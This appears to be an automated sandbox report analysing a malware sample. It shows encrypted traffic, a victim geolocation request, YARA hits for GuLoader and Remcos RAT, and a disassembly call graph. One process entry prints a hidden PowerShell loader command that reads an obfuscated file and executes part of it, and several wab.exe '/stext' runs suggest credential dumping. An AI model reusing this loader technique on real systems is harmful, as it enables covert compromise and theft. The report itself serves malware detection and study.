                                                Jul 15, 2024 09:23:55.840289116 CEST1289INData Raw: 67 45 17 f6 2b 9c 48 8e 89 a5 73 a4 b7 fc 4f 3d 18 c7 34 25 50 d4 c3 23 7d 91 35 9d a5 c8 cc db 9d 8b 92 b0 59 a2 86 8e b8 76 7f 46 4b 19 d1 0e 5a f0 ea 92 c1 08 68 2f f1 6f be a6 11 8f 1d dd c6 b3 20 36 45 d8 45 48 9b ed 71 b7 10 cf 00 ff 41 7a
                                                Data Ascii: gE+HsO=4%P#}5YvFKZh/o 6EEHqAzdpB(;.N9&$*m{W&nOh+MB(~gXYt9#lGqOia*'47(nAW/V2cE4j0?)`vI4:
                                                Jul 15, 2024 09:23:55.840317965 CEST1289INData Raw: 93 33 b6 42 56 4c 5b 2a 3f ee 81 62 0e 77 5d e5 dc cd d2 1b c2 c5 75 c3 91 5e d5 0b 42 0a ff 06 59 09 99 e1 0c 2b 95 e6 60 19 d0 4b 15 42 e7 c7 bd b5 68 dc 2a 14 0b 2f ac 97 e4 81 71 34 b8 da 35 fd 67 8c 77 05 80 0e 08 15 ed a7 2f 3d 55 6f e4 05
                                                Data Ascii: 3BVL[*?bw]u^BY+`KBh*/q45gw/=Uol~=rwd];%'$C]kqh2+Pg*HOOg7Z>d|ft| .|acv(AbA*Nxgl1s WUro^7i
                                                Jul 15, 2024 09:23:55.840329885 CEST1289INData Raw: 4a 68 29 c1 2d 65 73 a4 35 f2 f3 00 4f 8e f5 18 9d 1c d4 cb b6 08 85 7b 61 c8 50 c8 b1 df 15 4b 2e 8b 10 a0 95 39 61 91 f6 57 79 65 c0 c7 ed 20 5a b6 0a 06 1e e9 23 b3 22 21 55 08 2d 7f 47 38 71 b3 73 09 ab bf c0 90 6e fc 0a 79 0b 95 3e 0b 04 ef
                                                Data Ascii: Jh)-es5O{aPK.9aWye Z#"!U-G8qsny>9a]6xW'yR7]G%>8#^QX$_vo4M(&.>k$D}s~22 ys|h8mN1RdORt5^'|HF/4"rdVwa0g
                                                Jul 15, 2024 09:23:56.030767918 CEST1289INData Raw: 24 73 b6 03 50 5a 56 1e a1 2f 3a ab e6 21 2b bd 1b 3d a7 12 55 d7 23 79 49 d7 88 4c 90 c4 0b 6b a9 06 2d ed 41 68 0f 0f 49 9b fd 1f 8a 9d 9d 4a 4d c2 b9 1e bf 77 81 40 c7 19 fd af 86 a0 54 80 d1 44 dd c4 d0 0d 60 fe 7c 82 e8 19 d9 51 93 26 8a ab
                                                Data Ascii: $sPZV/:!+=U#yILk-AhIJMw@TD`|Q&cFUHy>J%HfN%,pV3PH!1V`c m*!5\qv<tH"R=T@N+^#&r<%&.}_X@z>H; 'D


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.11.3049862178.237.33.50808740C:\Program Files (x86)\Windows Mail\wab.exe
                                                TimestampBytes transferredDirectionData
                                                Jul 15, 2024 09:23:59.758152962 CEST71OUTGET /json.gp HTTP/1.1
                                                Host: geoplugin.net
                                                Cache-Control: no-cache
                                                Jul 15, 2024 09:24:00.086025000 CEST1182INHTTP/1.1 200 OK
                                                date: Mon, 15 Jul 2024 07:23:59 GMT
                                                server: Apache
                                                content-length: 974
                                                content-type: application/json; charset=utf-8
                                                cache-control: public, max-age=300
                                                access-control-allow-origin: *
                                                Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 31 2e 31 38 31 2e 35 34 2e 36 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4c 6f 73 20 41 6e 67 65 6c 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 43 61 6c 69 66 6f 72 6e 69 61 22 2c 0a [TRUNCATED]
                                                Data Ascii: { "geoplugin_request":"81.181.54.64", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Los Angeles", "geoplugin_region":"California", "geoplugin_regionCode":"CA", "geoplugin_regionName":"California", "geoplugin_areaCode":"", "geoplugin_dmaCode":"803", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"34.0544", "geoplugin_longitude":"-118.2441", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Los_Angeles", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:4
                                                Start time:03:23:21
                                                Start date:15/07/2024
                                                Path:C:\Users\user\Desktop\Uundgaaelige.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\Uundgaaelige.exe"
                                                Imagebase:0x400000
                                                File size:554'400 bytes
                                                MD5 hash:FC55407CC82612103C5971DCA1837D6B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:7
                                                Start time:03:23:22
                                                Start date:15/07/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"powershell.exe" -windowstyle hidden "$Acrasiales=Get-Content 'C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\Dialektologi.Alt';$Bodingly=$Acrasiales.SubString(40630,3);.$Bodingly($Acrasiales)
                                                Imagebase:0x7d0000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.216299419557.0000000009A31000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:8
                                                Start time:03:23:22
                                                Start date:15/07/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7d0140000
                                                File size:875'008 bytes
                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:10
                                                Start time:03:23:49
                                                Start date:15/07/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                Imagebase:0x690000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000003.216805263947.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000003.216795183142.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000003.216815635235.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000003.216825365435.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000003.216815635235.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000003.216795183142.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000003.216825365435.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000003.216805263947.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:11
                                                Start time:03:24:01
                                                Start date:15/07/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zygxucjbkjrxxomblbpmyjhjv"
                                                Imagebase:0x690000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:12
                                                Start time:03:24:01
                                                Start date:15/07/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zygxucjbkjrxxomblbpmyjhjv"
                                                Imagebase:0x690000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:13
                                                Start time:03:24:01
                                                Start date:15/07/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jsuqvvuvyrjcauafcmkobvuadfdgh"
                                                Imagebase:0x690000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:14
                                                Start time:03:24:01
                                                Start date:15/07/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\uuzawnnwmzbhkjwjlxwhmaojmmvpaift"
                                                Imagebase:0x690000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:15
                                                Start time:03:24:53
                                                Start date:15/07/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mwrouticoypgwqnwbsfvbzcmbt"
                                                Imagebase:0x690000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:16
                                                Start time:03:24:53
                                                Start date:15/07/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wqwgumtekghlzwjakdzpeexukhhct"
                                                Imagebase:0x690000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:17
                                                Start time:03:24:53
                                                Start date:15/07/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wqwgumtekghlzwjakdzpeexukhhct"
                                                Imagebase:0x690000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:18
                                                Start time:03:24:53
                                                Start date:15/07/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ysczveexyozqjcxecnmqprrlsorluovz"
                                                Imagebase:0x690000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:19
                                                Start time:03:25:23
                                                Start date:15/07/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rsjsvpyaezilg"
                                                Imagebase:0x690000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:20
                                                Start time:03:25:23
                                                Start date:15/07/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\grwn"
                                                Imagebase:0x690000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:21
                                                Start time:03:25:23
                                                Start date:15/07/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gbhsgqnscotpcxmkxqfqyqcvmcvl"
                                                Imagebase:0x690000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:22
                                                Start time:03:25:23
                                                Start date:15/07/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gbhsgqnscotpcxmkxqfqyqcvmcvl"
                                                Imagebase:0x690000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:25
                                                Start time:03:25:51
                                                Start date:15/07/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8740 -s 1424
                                                Imagebase:0x1f0000
                                                File size:482'640 bytes
                                                MD5 hash:40A149513D721F096DDF50C04DA2F01F
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:23.8%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:21.6%
                                                  Total number of Nodes:1302
                                                  Total number of Limit Nodes:41
                                                  execution_graph 3931 4025c4 3932 402a9f 17 API calls 3931->3932 3936 4025ce 3932->3936 3933 40263c 3934 405caa ReadFile 3934->3936 3935 40263e 3940 405ff7 wsprintfA 3935->3940 3936->3933 3936->3934 3936->3935 3937 40264e 3936->3937 3937->3933 3939 402664 SetFilePointer 3937->3939 3939->3933 3940->3933 3068 402245 3083 402ac1 3068->3083 3071 402ac1 17 API calls 3072 402254 3071->3072 3073 402ac1 17 API calls 3072->3073 3074 40225d 3073->3074 3089 40639c FindFirstFileA 3074->3089 3077 402277 lstrlenA lstrlenA 3079 4051c0 24 API calls 3077->3079 3080 4022b3 SHFileOperationA 3079->3080 3081 402272 3080->3081 3082 40226a 3080->3082 3092 4051c0 3082->3092 3084 402acd 3083->3084 3103 4060bb 3084->3103 3087 40224b 3087->3071 3090 4063b2 FindClose 3089->3090 3091 402266 3089->3091 3090->3091 3091->3077 3091->3082 3093 40527e 3092->3093 3094 4051db 3092->3094 3093->3081 3095 4051f8 lstrlenA 3094->3095 3098 4060bb 17 API calls 3094->3098 3096 405221 3095->3096 3097 405206 lstrlenA 3095->3097 3100 405234 3096->3100 3101 405227 SetWindowTextA 3096->3101 3097->3093 3099 405218 lstrcatA 3097->3099 3098->3095 3099->3096 3100->3093 3102 40523a SendMessageA SendMessageA SendMessageA 3100->3102 3101->3100 3102->3093 3107 4060c8 3103->3107 3104 4062ea 3105 402aee 3104->3105 3136 406099 lstrcpynA 3104->3136 3105->3087 3120 406303 3105->3120 3107->3104 3108 4062c4 lstrlenA 3107->3108 3111 4060bb 10 API calls 3107->3111 3113 4061e0 GetSystemDirectoryA 3107->3113 3114 4061f3 GetWindowsDirectoryA 3107->3114 3115 406303 5 API calls 3107->3115 3116 406227 SHGetSpecialFolderLocation 3107->3116 3117 4060bb 10 API calls 3107->3117 3118 40626d lstrcatA 3107->3118 3129 405f80 3107->3129 3134 405ff7 wsprintfA 3107->3134 3135 406099 lstrcpynA 3107->3135 3108->3107 3111->3108 3113->3107 3114->3107 3115->3107 3116->3107 3119 40623f SHGetPathFromIDListA CoTaskMemFree 3116->3119 3117->3107 3118->3107 3119->3107 3123 40630f 3120->3123 3121 406377 3122 40637b CharPrevA 3121->3122 3125 406396 3121->3125 3122->3121 3123->3121 3124 40636c CharNextA 3123->3124 3127 40635a CharNextA 3123->3127 3128 406367 CharNextA 3123->3128 3141 405a5c 3123->3141 3124->3121 3124->3123 3125->3087 3127->3123 3128->3124 3137 405f1f 3129->3137 3132 405fb4 RegQueryValueExA RegCloseKey 3133 405fe3 3132->3133 3133->3107 3134->3107 3135->3107 3136->3105 3138 405f2e 3137->3138 3139 405f32 3138->3139 3140 405f37 RegOpenKeyExA 3138->3140 3139->3132 3139->3133 3140->3139 3142 405a62 3141->3142 3143 405a75 3142->3143 3144 405a68 CharNextA 3142->3144 3143->3123 3144->3142 3948 4028c5 3949 402a9f 17 API calls 3948->3949 3950 4028cb 3949->3950 3951 402900 3950->3951 3952 402716 3950->3952 3954 4028dd 3950->3954 3951->3952 3953 4060bb 17 API calls 3951->3953 3953->3952 3954->3952 3956 405ff7 wsprintfA 3954->3956 3956->3952 3145 401746 3146 402ac1 17 API calls 3145->3146 3147 40174d 3146->3147 3151 405c61 3147->3151 3149 401754 3150 405c61 2 API calls 3149->3150 3150->3149 3152 405c6c GetTickCount GetTempFileNameA 3151->3152 3153 405c99 3152->3153 3154 405c9d 3152->3154 3153->3152 3153->3154 3154->3149 3957 401947 3958 402ac1 17 API calls 3957->3958 3959 40194e lstrlenA 3958->3959 3960 402577 3959->3960 3961 4022c7 3962 4022ce 3961->3962 3965 4022e1 3961->3965 3963 4060bb 17 API calls 3962->3963 3964 4022db 3963->3964 3966 4057b5 MessageBoxIndirectA 3964->3966 3966->3965 3967 4045ca 3968 4045f6 3967->3968 3969 404607 3967->3969 4028 405799 GetDlgItemTextA 3968->4028 3971 404613 GetDlgItem 3969->3971 3978 404672 3969->3978 3973 404627 3971->3973 3972 404601 3975 406303 5 API calls 3972->3975 3976 40463b SetWindowTextA 3973->3976 3981 405aca 4 API calls 3973->3981 3974 404756 3977 404900 3974->3977 4030 405799 GetDlgItemTextA 3974->4030 3975->3969 3982 40415a 18 API calls 3976->3982 3980 4041c1 8 API calls 3977->3980 3978->3974 3978->3977 3983 4060bb 17 API calls 3978->3983 3985 404914 3980->3985 3986 404631 3981->3986 3987 404657 3982->3987 3988 4046e6 SHBrowseForFolderA 3983->3988 3984 404786 3989 405b1f 18 API calls 3984->3989 3986->3976 3995 405a31 3 API calls 3986->3995 3990 40415a 18 API calls 3987->3990 3988->3974 3991 4046fe CoTaskMemFree 3988->3991 3992 40478c 3989->3992 3993 404665 3990->3993 3994 405a31 3 API calls 3991->3994 4031 406099 lstrcpynA 3992->4031 4029 40418f SendMessageA 3993->4029 3997 40470b 3994->3997 3995->3976 4000 404742 SetDlgItemTextA 3997->4000 4004 4060bb 17 API calls 3997->4004 3999 40466b 4002 406431 5 API calls 3999->4002 4000->3974 4001 4047a3 4003 406431 5 API calls 4001->4003 4002->3978 4011 4047aa 4003->4011 4005 40472a lstrcmpiA 4004->4005 4005->4000 4008 40473b lstrcatA 4005->4008 4006 4047e6 4032 406099 lstrcpynA 4006->4032 4008->4000 4009 4047ed 4010 405aca 4 API calls 4009->4010 4012 4047f3 GetDiskFreeSpaceA 4010->4012 4011->4006 4015 405a78 2 API calls 4011->4015 4016 40483e 4011->4016 4014 404817 MulDiv 4012->4014 4012->4016 4014->4016 4015->4011 4025 4048af 4016->4025 4033 404a46 4016->4033 4018 4048d2 4044 40417c KiUserCallbackDispatcher 4018->4044 4020 40140b 2 API calls 4020->4018 4022 4048b1 SetDlgItemTextA 4022->4025 4023 4048a1 4036 404981 4023->4036 4025->4018 4025->4020 4026 4048ee 4026->3977 4045 404523 4026->4045 4028->3972 4029->3999 4030->3984 4031->4001 4032->4009 4034 404981 20 API calls 4033->4034 4035 40489c 4034->4035 4035->4022 4035->4023 4037 404997 4036->4037 4038 4060bb 17 API calls 4037->4038 4039 4049fb 4038->4039 4040 4060bb 17 API calls 4039->4040 4041 404a06 4040->4041 4042 4060bb 17 API calls 4041->4042 4043 404a1c lstrlenA wsprintfA SetDlgItemTextA 4042->4043 4043->4025 4044->4026 4046 404531 4045->4046 4047 404536 SendMessageA 4045->4047 4046->4047 4047->3977 4051 4020cb 4052 402ac1 17 API calls 4051->4052 4053 4020d2 4052->4053 4054 402ac1 17 API calls 4053->4054 4055 4020dc 4054->4055 4056 402ac1 17 API calls 4055->4056 4057 4020e6 4056->4057 4058 402ac1 17 API calls 4057->4058 4059 4020f0 4058->4059 4060 402ac1 17 API calls 4059->4060 4061 4020fa 4060->4061 4062 40213c CoCreateInstance 4061->4062 4063 402ac1 17 API calls 4061->4063 4066 40215b 4062->4066 4068 402206 4062->4068 4063->4062 4064 401423 24 API calls 4065 40223c 4064->4065 4067 4021e6 MultiByteToWideChar 4066->4067 4066->4068 4067->4068 4068->4064 4068->4065 4069 4026ce 4070 4026d4 4069->4070 4071 4026d8 FindNextFileA 4070->4071 4073 4026ea 4070->4073 4072 402729 4071->4072 4071->4073 4075 406099 lstrcpynA 4072->4075 4075->4073 3720 4023d0 3721 402ac1 17 API calls 3720->3721 3722 4023e2 3721->3722 3723 402ac1 17 API calls 3722->3723 3724 4023ec 3723->3724 3737 402b51 3724->3737 3727 402716 3728 402421 3730 40242d 3728->3730 3741 402a9f 3728->3741 3729 402ac1 17 API calls 3732 40241a lstrlenA 3729->3732 3731 40244c RegSetValueExA 3730->3731 3734 40303e 44 API calls 3730->3734 3735 402462 RegCloseKey 3731->3735 3732->3728 3734->3731 3735->3727 3738 402b6c 3737->3738 3744 405f4d 3738->3744 3742 4060bb 17 API calls 3741->3742 3743 402ab4 3742->3743 3743->3730 3745 405f5c 3744->3745 3746 4023fc 3745->3746 3747 405f67 RegCreateKeyExA 3745->3747 3746->3727 3746->3728 3746->3729 3747->3746 4076 401cd4 4077 402a9f 17 API calls 4076->4077 4078 401cda IsWindow 4077->4078 4079 401a0e 4078->4079 3754 4014d6 3755 402a9f 17 API calls 3754->3755 3756 4014dc Sleep 3755->3756 3758 402951 3756->3758 3759 401759 3760 402ac1 17 API calls 3759->3760 3761 401760 3760->3761 3762 401786 3761->3762 3763 40177e 3761->3763 3799 406099 lstrcpynA 3762->3799 3798 406099 lstrcpynA 3763->3798 3766 401784 3770 406303 5 API calls 3766->3770 3767 401791 3768 405a31 3 API calls 3767->3768 3769 401797 lstrcatA 3768->3769 3769->3766 3787 4017a3 3770->3787 3771 40639c 2 API calls 3771->3787 3772 405c0d 2 API calls 3772->3787 3774 4017ba CompareFileTime 3774->3787 3775 40187e 3777 4051c0 24 API calls 3775->3777 3776 401855 3778 4051c0 24 API calls 3776->3778 3786 40186a 3776->3786 3779 401888 3777->3779 3778->3786 3780 40303e 44 API calls 3779->3780 3782 40189b 3780->3782 3781 406099 lstrcpynA 3781->3787 3783 4018af SetFileTime 3782->3783 3785 4018c1 FindCloseChangeNotification 3782->3785 3783->3785 3784 4060bb 17 API calls 3784->3787 3785->3786 3788 4018d2 3785->3788 3787->3771 3787->3772 3787->3774 3787->3775 3787->3776 3787->3781 3787->3784 3794 4057b5 MessageBoxIndirectA 3787->3794 3797 405c32 GetFileAttributesA CreateFileA 3787->3797 3789 4018d7 3788->3789 3790 4018ea 3788->3790 3792 4060bb 17 API calls 3789->3792 3791 4060bb 17 API calls 3790->3791 3793 4018f2 3791->3793 3795 4018df lstrcatA 3792->3795 3796 4057b5 MessageBoxIndirectA 3793->3796 3794->3787 3795->3793 3796->3786 3797->3787 3798->3766 3799->3767 4080 401659 4081 402ac1 17 API calls 4080->4081 4082 40165f 4081->4082 4083 40639c 2 API calls 4082->4083 4084 401665 4083->4084 4085 401959 4086 402a9f 17 API calls 4085->4086 4087 401960 4086->4087 4088 402a9f 17 API calls 4087->4088 4089 40196d 4088->4089 4090 402ac1 17 API calls 4089->4090 4091 401984 lstrlenA 4090->4091 4093 401994 4091->4093 4092 4019d4 4093->4092 4097 406099 lstrcpynA 4093->4097 4095 4019c4 4095->4092 4096 4019c9 lstrlenA 4095->4096 4096->4092 4097->4095 4105 401f5b 4106 402ac1 17 API calls 4105->4106 4107 401f62 4106->4107 4108 406431 5 API calls 4107->4108 4109 401f71 4108->4109 4110 401f89 GlobalAlloc 4109->4110 4112 401ff1 4109->4112 4111 401f9d 4110->4111 4110->4112 4113 406431 5 API calls 4111->4113 4114 401fa4 4113->4114 4115 406431 5 API calls 4114->4115 4116 401fae 4115->4116 4116->4112 4120 405ff7 wsprintfA 4116->4120 4118 401fe5 4121 405ff7 wsprintfA 4118->4121 4120->4118 4121->4112 4122 40255b 4123 402ac1 17 API calls 4122->4123 4124 402562 4123->4124 4127 405c32 GetFileAttributesA CreateFileA 4124->4127 4126 40256e 4127->4126 4135 401b5d 4136 401b6a 4135->4136 4137 401bae 4135->4137 4138 4022ce 4136->4138 4146 401b81 4136->4146 4139 401bd7 GlobalAlloc 4137->4139 4142 401bb2 4137->4142 4141 4060bb 17 API calls 4138->4141 4140 4060bb 17 API calls 4139->4140 4144 401bf2 4140->4144 4145 4022db 4141->4145 4142->4144 4156 406099 lstrcpynA 4142->4156 4149 4057b5 MessageBoxIndirectA 4145->4149 4154 406099 lstrcpynA 4146->4154 4147 401bc4 GlobalFree 4147->4144 4149->4144 4150 401b90 4155 406099 lstrcpynA 4150->4155 4152 401b9f 4157 406099 lstrcpynA 4152->4157 4154->4150 4155->4152 4156->4147 4157->4144 4158 401a5e 4159 402a9f 17 API calls 4158->4159 4160 401a64 4159->4160 4161 402a9f 17 API calls 4160->4161 4162 401a0e 4161->4162 3919 4024df 3920 402b01 17 API calls 3919->3920 3921 4024e9 3920->3921 3922 402a9f 17 API calls 3921->3922 3923 4024f2 3922->3923 3924 402500 3923->3924 3929 402716 3923->3929 3925 402519 RegEnumValueA 3924->3925 3926 40250d RegEnumKeyA 3924->3926 3927 402535 RegCloseKey 3925->3927 3928 40252e 3925->3928 3926->3927 3927->3929 3928->3927 4163 402c61 4164 402c70 SetTimer 4163->4164 4165 402c89 4163->4165 4164->4165 4166 402cd7 4165->4166 